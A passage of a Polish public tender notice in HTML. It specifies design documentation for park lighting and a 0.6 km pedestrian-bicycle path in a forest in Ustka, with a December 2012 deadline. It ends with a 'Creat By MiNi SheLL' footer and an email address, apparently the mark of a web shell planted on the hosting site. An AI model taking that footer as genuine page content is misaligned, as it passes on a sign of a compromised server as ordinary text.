--- branży elektrycznej - oświetlenie parkowe projektowanych i istniejących ciągów komunikacyjnych (ok. 122 lamp parkowych), podświetlenie wybranych drzew  w ilości 3-5 sztuk;
b) przedmiarów robót;
c) kosztorysów inwestoriskich;
d) specyfikacji technicznych wykonania i odbioru robót.
4. Wykonawca we własnym zakresie i na własny koszt:
1)	zabezpieczy obsługę geodezyjną, geologiczną i geotechniczną,
2)	wykona wszystkie pomiary, badania, obliczenia i ekspertyzy potrzebne do prawidłowego opracowania dokumentacji technicznej,
3)	uzyska wszystkie warunki, opinie, decyzje i uzgodnienia niezbędne (bez ZUD) do prawidłowego wykonania opracowań oraz wymagane do uzyskania decyzji administracyjnej będącej pozwoleniem na budowę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.23.20.00-4, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie dokumentacji budowlanej dla zadania pn.: Budowa ciągu pieszo - rowerowego na terenie lasu - od ul. Kościelniaka do drogi brukowej wzdłuż plaży zachodniej w Ustce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zadania jest opracowanie dokumentacji budowlanej dla zadania pn.: Budowa ciągu pieszo - rowerowego na terenie lasu - od ul. Kościelniaka do drogi brukowej wzdłuż plaży zachodniej w Ustce
2. Inwestycja zlokalizowana jest w granicach obecnie sporządzanego Miejscowego Planu Zagospodarowania Przestrzennego: UROCZYSKO, na obszarze projektowanych jednostek urbanistycznych o symbolach: 22.KPp, 21.KPp, 20.KPp - położonych na działce nr  2677; lokalizacja inwestycji określona jest na mapie stanowiącej załącznik nr 7/3 do SIWZ.
3. Realizacja  zadania polega na wykonaniu niżej wymienionych opracowań i usług:
1)	wykonaniu dokumentacji geotechnicznej warunków posadowienia obiektów budowlanych,
2)	opracowaniu dokumentacji budowlanej, składającej się z:
a) projektów budowlanych i wykonawczych:
--- zagospodarowania terenu: zbiorczy plan zagospodarowania terenu, oświetlenia, zieleni, ciągów pieszo-rowerowych, elementów małej architektury;
--- architektury:  rozwiązania architektoniczne zagospodarowania terenu z uwzględnieniem ciągu pieszo-rowerowego o nawierzchni z kostki brukowej betonowej o długości ok. 0,6 km, elementów małej architektury: drogowskazy, tablice informacyjne, znaki informacyjne, słupki, palisady, stalowe kraty ochronne wokół drzew, ławki, kosze;
---branży konstrukcyjno-budowlanej: projekty konstrukcyjne nawierzchni i innych elementów wymagających konstrukcji podstawowych;
--- branży elektrycznej: oświetlenie parkowe ciągów pieszo-rowerowych;
b) przedmiarów robót;
c) kosztorysów inwestoriskich;
d) specyfikacji technicznych wykonania i odbioru robót.
4.Wykonawca we własnym zakresie i na własny koszt:
1)	zabezpieczy obsługę geodezyjną, geologiczną i geotechniczną,
2)	wykona wszystkie pomiary, badania, obliczenia i ekspertyzy potrzebne do prawidłowego opracowania dokumentacji technicznej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.23.20.00-4, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com